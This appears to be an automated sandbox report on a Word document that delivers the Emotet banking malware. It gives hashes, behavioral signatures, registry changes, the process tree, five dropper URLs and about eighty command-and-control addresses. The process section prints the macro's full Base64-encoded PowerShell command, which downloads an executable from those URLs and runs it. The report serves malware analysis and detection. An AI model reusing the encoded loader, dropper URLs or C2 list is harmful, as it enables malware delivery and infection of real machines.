Analysis
-
max time kernel
67s -
max time network
114s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
01-08-2020 19:37
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.12119.17670.7154.doc
Resource
win7v200722
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.12119.17670.7154.doc
-
Size
174KB
-
MD5
1e522cb3efd6b827ac682b262c9e26a3
-
SHA1
d444e2e6ecf2f973e82c016dbbc6601d1b6c547c
-
SHA256
ea1d07ae55467195b610358c91f9d4cb4f280d055e9a86158339ca3bdba8ca15
-
SHA512
2e83b3f5120e4e719f37f24142863ec89c85578aaecf3684d1f7d4cf3bb238ab0fb405536b51d968320287ae8455b849811351b93c532e137e1b1da47437fadc
Malware Config
Extracted
http://www.librero.xyz/Scripts/3y_m0cbe_lpgoj7z/
https://scoenuganda.org/wp-admin/k_fhsvc_wni2zxzrc/
https://www.dunnriteplumbing.ca/wp-admin/12x_jaaq_o3/
http://www.najcosmetics.com/img/hvglv_hay_35sacodg/
http://www.oxahaus.com/wp-admin/d8teb_n0v0h_dm0uyok/
Extracted
emotet
142.105.151.124:443
62.108.54.22:8080
212.51.142.238:8080
71.208.216.10:80
108.48.41.69:80
83.110.223.58:443
210.165.156.91:80
104.131.44.150:8080
104.236.246.93:8080
5.39.91.110:7080
209.141.54.221:8080
209.182.216.177:443
153.126.210.205:7080
91.211.88.52:7080
180.92.239.110:8080
183.101.175.193:80
162.241.92.219:8080
87.106.139.101:8080
114.146.222.200:80
65.111.120.223:80
113.160.130.116:8443
190.160.53.126:80
62.75.141.82:80
46.105.131.87:80
203.153.216.189:7080
46.105.131.79:8080
91.231.166.124:8080
81.2.235.111:8080
189.212.199.126:443
95.9.185.228:443
169.239.182.217:8080
47.153.182.47:80
116.203.32.252:8080
139.130.242.43:80
75.139.38.211:80
41.60.200.34:80
47.144.21.12:443
103.86.49.11:8080
95.179.229.244:8080
173.91.22.41:80
70.167.215.250:8080
110.145.77.103:80
85.59.136.180:8080
5.196.74.210:8080
24.234.133.205:80
76.27.179.47:80
104.131.11.150:443
87.106.136.232:8080
61.19.246.238:443
201.173.217.124:443
176.111.60.55:8080
200.55.243.138:8080
74.208.45.104:8080
139.59.60.244:8080
67.241.24.163:8080
24.43.99.75:80
93.51.50.171:8080
109.74.5.95:8080
137.59.187.107:8080
37.139.21.175:8080
157.245.99.39:8080
124.45.106.173:443
47.146.117.214:80
95.213.236.64:8080
62.138.26.28:8080
190.55.181.54:443
24.179.13.119:80
152.168.248.128:443
222.214.218.37:4143
168.235.67.138:7080
181.230.116.163:80
121.124.124.40:7080
79.98.24.39:8080
37.187.72.193:8080
162.154.38.103:80
78.24.219.147:8080
200.41.121.90:80
185.94.252.104:443
50.116.86.205:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1044 752 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powersheLL.exeVAN.exepid process 1044 powersheLL.exe 1044 powersheLL.exe 1608 VAN.exe 1608 VAN.exe -
Blacklisted process makes network request 3 IoCs
Processes:
powersheLL.exeflow pid process 4 1044 powersheLL.exe 6 1044 powersheLL.exe 8 1044 powersheLL.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
463.exedescription pid process target process PID 1852 wrote to memory of 1608 1852 463.exe VAN.exe PID 1852 wrote to memory of 1608 1852 463.exe VAN.exe PID 1852 wrote to memory of 1608 1852 463.exe VAN.exe PID 1852 wrote to memory of 1608 1852 463.exe VAN.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/1852-11-0x0000000000300000-0x000000000030C000-memory.dmp emotet behavioral1/memory/1852-11-0x0000000000300000-0x000000000030C000-memory.dmp emotet behavioral1/memory/1608-15-0x0000000000380000-0x000000000038C000-memory.dmp emotet behavioral1/memory/1608-15-0x0000000000380000-0x000000000038C000-memory.dmp emotet -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95550055-95B2-4C65-BC8B-1A8F9D72AA51} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95550055-95B2-4C65-BC8B-1A8F9D72AA51}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95550055-95B2-4C65-BC8B-1A8F9D72AA51}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95550055-95B2-4C65-BC8B-1A8F9D72AA51}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\TypeLib\{95550055-95B2-4C65-BC8B-1A8F9D72AA51}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95550055-95B2-4C65-BC8B-1A8F9D72AA51}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 836 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXE463.exeVAN.exepid process 836 WINWORD.EXE 836 WINWORD.EXE 1852 463.exe 1608 VAN.exe -
Drops file in System32 directory 2 IoCs
Processes:
463.exepowersheLL.exedescription ioc process File opened for modification C:\Windows\SysWOW64\apircl\VAN.exe 463.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1044 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
463.exeVAN.exepid process 1852 463.exe 1608 VAN.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.12119.17670.7154.doc"1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABSAFcAVQBIAE8AYQBxAHQAPQAnAFoAVwBSAEcAVwBiAHQAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIAaQB0AGAAeQBgAFAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAQgBJAFIAUwBCAHEAeQBnACAAPQAgACcANAA2ADMAJwA7ACQARgBKAEkATgBFAGoAaQBkAD0AJwBUAEYARwBEAEIAbAB2AGMAJwA7ACQASgBCAFIAVQBGAGUAcwBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABCAEkAUgBTAEIAcQB5AGcAKwAnAC4AZQB4AGUAJwA7ACQAQwBNAFEARABMAG0AcwBzAD0AJwBWAE0AUABaAEMAZQBjAGIAJwA7ACQAWgBaAFYASgBBAHYAagBuAD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAHcAZQBiAGMAbABpAGUATgBUADsAJABaAE8ATgBGAFQAcgBqAGwAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAGkAYgByAGUAcgBvAC4AeAB5AHoALwBTAGMAcgBpAHAAdABzAC8AMwB5AF8AbQAwAGMAYgBlAF8AbABwAGcAbwBqADcAegAvACoAaAB0AHQAcABzADoALwAvAHMAYwBvAGUAbgB1AGcAYQBuAGQAYQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AawBfAGYAaABzAHYAYwBfAHcAbgBpADIAegB4AHoAcgBjAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHUAbgBuAHIAaQB0AGUAcABsAHUAbQBiAGkAbgBnAC4AYwBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AMQAyAHgAXwBqAGEAYQBxAF8AbwAzAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbgBhAGoAYwBvAHMAbQBlAHQAaQBjAHMALgBjAG8AbQAvAGkAbQBnAC8AaAB2AGcAbAB2AF8AaABhAHkAXwAzADUAcwBhAGMAbwBkAGcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBvAHgAYQBoAGEAdQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkADgAdABlAGIAXwBuADAAdgAwAGgAXwBkAG0AMAB1AHkAbwBrAC8AJwAuACIAcwBQAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABKAEkAUABYAEcAeAB2AGEAPQAnAFMAVABQAFYAQQB6AGwAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBIAFgAQwBIAHAAbgB5ACAAaQBuACAAJABaAE8ATgBGAFQAcgBqAGwAKQB7AHQAcgB5AHsAJABaAFoAVgBKAEEAdgBqAG4ALgAiAGQAbwBgAHcATgBMAGAATwBBAEQARgBpAGAAbABlACIAKAAkAE0ASABYAEMASABwAG4AeQAsACAAJABKAEIAUgBVAEYAZQBzAG8AKQA7ACQARwBCAFgAVgBVAG0AdABtAD0AJwBGAFUARABDAEIAYQBxAG0AJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABKAEIAUgBVAEYAZQBzAG8AKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAzADQAOAA1ADAAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAEMAYABSAGAARQBhAHQAZQAiACgAJABKAEIAUgBVAEYAZQBzAG8AKQA7ACQARgBGAFQASQBMAGEAYQB5AD0AJwBaAEwAUQBPAEYAZgB2AHoAJwA7AGIAcgBlAGEAawA7ACQATgBPAEMARABVAGcAcABnAD0AJwBRAFIAUABGAE8AZwBzAHIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBTAE0AVgBVAG4AdABtAD0AJwBQAEcAWABXAEYAYQBzAHoAJwA=1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\463.exeC:\Users\Admin\463.exe1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Executes dropped EXE
-
C:\Windows\SysWOW64\apircl\VAN.exe"C:\Windows\SysWOW64\apircl\VAN.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\463.exe
-
C:\Users\Admin\463.exe
-
C:\Windows\SysWOW64\apircl\VAN.exe
-
memory/836-2-0x00000000089E0000-0x00000000089E4000-memory.dmpFilesize
16KB
-
memory/836-4-0x0000000006F50000-0x0000000007150000-memory.dmpFilesize
2.0MB
-
memory/836-5-0x000000000AF10000-0x000000000AF14000-memory.dmpFilesize
16KB
-
memory/836-6-0x000000000BF90000-0x000000000BF94000-memory.dmpFilesize
16KB
-
memory/836-9-0x0000000002180000-0x0000000002181000-memory.dmpFilesize
4KB
-
memory/1608-13-0x0000000000000000-mapping.dmp
-
memory/1608-15-0x0000000000380000-0x000000000038C000-memory.dmpFilesize
48KB
-
memory/1852-11-0x0000000000300000-0x000000000030C000-memory.dmpFilesize
48KB